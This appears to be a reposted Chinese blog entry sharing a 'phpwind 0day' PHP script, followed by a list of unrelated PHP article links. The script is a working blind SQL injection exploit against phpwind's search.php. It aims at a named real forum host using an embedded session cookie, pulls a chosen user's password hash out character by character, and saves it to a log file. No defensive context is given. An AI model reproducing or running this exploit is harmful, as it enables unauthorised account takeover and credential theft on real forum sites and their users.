从网上搜到的phpwind 0day的代码


Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

PHP 相关文章推荐
通过html表格发电子邮件
Oct 09 PHP
php学习笔记之 函数声明
Jun 09 PHP
PHP5.4中json_encode中文转码的变化小结
Jan 30 PHP
PHP调用MsSQL Server 2012存储过程获取多结果集(包含output参数)的详解
Jul 03 PHP
使用php计算排列组合的方法
Nov 13 PHP
两千行代码的PHP学习笔记汇总
Oct 05 PHP
php实现图片等比例缩放代码
Jul 23 PHP
手把手编写PHP框架 深入了解MVC运行流程
Sep 19 PHP
PHP字典树(Trie树)定义与实现方法示例
Oct 09 PHP
Laravel框架实现的记录SQL日志功能示例
Jun 19 PHP
PHP按一定比例压缩图片的方法
Oct 12 PHP
Laravel5.1 框架控制器基础用法实例分析
Jan 04 PHP
ajax缓存问题解决途径
Dec 06 #PHP
数字转英文
Dec 06 #PHP
?生?D片??C字串
Dec 06 #PHP
?算你??的 PHP 程式大小
Dec 06 #PHP
PHP中,文件上传
Dec 06 #PHP
eWebEditor v3.8 商业完整版 (PHP)
Dec 06 #PHP
实现 win2003 下 mysql 数据库每天自动备份
Dec 06 #PHP
You might like
建立文件交换功能的脚本(三)
2006/10/09 PHP
如何获知PHP程序占用多少内存(memory_get_usage)
2012/09/23 PHP
PHP实现绘制3D扇形统计图及图片缩放实例
2014/10/01 PHP
探究Laravel使用env函数读取环境变量为null的问题
2016/12/06 PHP
ThinkPHP框架实现的邮箱激活功能示例
2018/06/15 PHP
jquery表单验证框架提供的身份证验证方法(示例代码)
2013/12/27 Javascript
jQuery中offset()方法用法实例
2015/01/16 Javascript
nodejs中sleep功能实现暂停几秒的方法
2017/07/12 NodeJs
安装Node.js并启动本地服务的操作教程
2018/05/12 Javascript
JS实现带阴历的日历功能详解
2019/01/24 Javascript
bootstrapValidator表单校验、更改状态、新增、移除校验字段的实例代码
2020/05/19 Javascript
js+canvas实现五子棋小游戏
2020/08/02 Javascript
使用JavaScript和MQTT开发物联网应用示例解析
2020/08/07 Javascript
[02:34]2016完美“圣”典风云人物:BurNIng专访
2016/12/10 DOTA
一个基于flask的web应用诞生 组织结构调整(7)
2017/04/11 Python
使用python实现语音文件的特征提取方法
2019/01/09 Python
python设置代理和添加镜像源的方法
2020/02/14 Python
python 连续不等式语法糖实例
2020/04/15 Python
python中线程和进程有何区别
2020/06/17 Python
python实现b站直播自动发送弹幕功能
2021/02/20 Python
SVG实现多彩圆环倒计时效果的示例代码
2017/11/21 HTML / CSS
canvas线条的属性详解
2018/03/27 HTML / CSS
Html5适配iphoneX刘海屏的简单实现
2019/04/09 HTML / CSS
Annoushka英国官网:英国奢侈珠宝品牌
2018/10/20 全球购物
LORAC官网:美国彩妆品牌
2019/08/27 全球购物
美国最好的葡萄酒网上商店:Wine Library
2019/11/02 全球购物
日本订房网站,预订日本星级酒店/温泉旅馆:Relux(支持中文)
2020/01/03 全球购物
简历的个人自我评价范文
2014/01/03 职场文书
两年的个人工作自我评价
2014/01/10 职场文书
师说教学反思
2014/02/07 职场文书
毕业生应聘求职信
2014/07/10 职场文书
小学运动会演讲稿
2014/08/25 职场文书
贷款收入证明范本
2015/06/12 职场文书
结婚典礼主持词
2015/06/29 职场文书
初中政治教师教学反思
2016/02/23 职场文书
使用MybatisPlus打印sql语句
2022/04/22 SQL Server